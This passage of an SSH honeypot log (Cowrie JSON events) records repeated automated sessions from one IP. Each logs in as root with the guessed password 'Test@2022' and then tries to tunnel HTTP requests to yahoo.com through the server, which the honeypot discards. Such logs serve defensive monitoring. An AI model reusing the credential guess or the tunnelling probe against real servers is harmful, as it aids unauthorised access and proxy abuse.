-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.827641Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.062502Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2265,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2265","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.110497Z","session":"dd40d247541a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.157856Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":28631,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28631","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.293707Z","session":"dd40d247541a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.341560Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.389715Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37641,"dst_ip":"1.2.3.4","dst_port":22,"session":"96a5a73464da","protocol":"ssh","message":"New connection: 213.209.150.239:37641 (1.2.3.4:22) [session: 96a5a73464da]","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.436128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.437518Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.485530Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.720627Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":3890,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3890","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.769684Z","session":"96a5a73464da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.817396Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29124,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29124","sensor":"my-vps","timestamp":"2025-08-26T01:05:40.953641Z","session":"96a5a73464da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.000900Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.048825Z","src_ip":"213.209.150.239","session":"96a5a73464da"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37813,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff676b39e5e1","protocol":"ssh","message":"New connection: 213.209.150.239:37813 (1.2.3.4:22) [session: ff676b39e5e1]","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.094608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.095457Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.142333Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.376420Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":23801,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23801","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.424497Z","session":"ff676b39e5e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.471689Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25320,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25320","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.609343Z","session":"ff676b39e5e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.656970Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.704628Z","src_ip":"213.209.150.239","session":"ff676b39e5e1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37891,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac716a7dd1d5","protocol":"ssh","message":"New connection: 213.209.150.239:37891 (1.2.3.4:22) [session: ac716a7dd1d5]","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.751197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.752067Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:41.799086Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.033939Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29264,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29264","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.082024Z","session":"ac716a7dd1d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.130047Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":15232,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15232","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.265619Z","session":"ac716a7dd1d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.312976Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.360884Z","src_ip":"213.209.150.239","session":"ac716a7dd1d5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37959,"dst_ip":"1.2.3.4","dst_port":22,"session":"36404d4beba6","protocol":"ssh","message":"New connection: 213.209.150.239:37959 (1.2.3.4:22) [session: 36404d4beba6]","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.416589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.417763Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.474507Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.757743Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":14698,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:14698","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.815303Z","session":"36404d4beba6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:42.871940Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":26747,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26747","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.027063Z","session":"36404d4beba6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.083841Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.141335Z","src_ip":"213.209.150.239","session":"36404d4beba6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38028,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b4b77c87735","protocol":"ssh","message":"New connection: 213.209.150.239:38028 (1.2.3.4:22) [session: 8b4b77c87735]","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.197018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.197949Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.255387Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.537917Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16611,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16611","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.595482Z","session":"8b4b77c87735"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.652416Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30838,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30838","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.807103Z","session":"8b4b77c87735"}
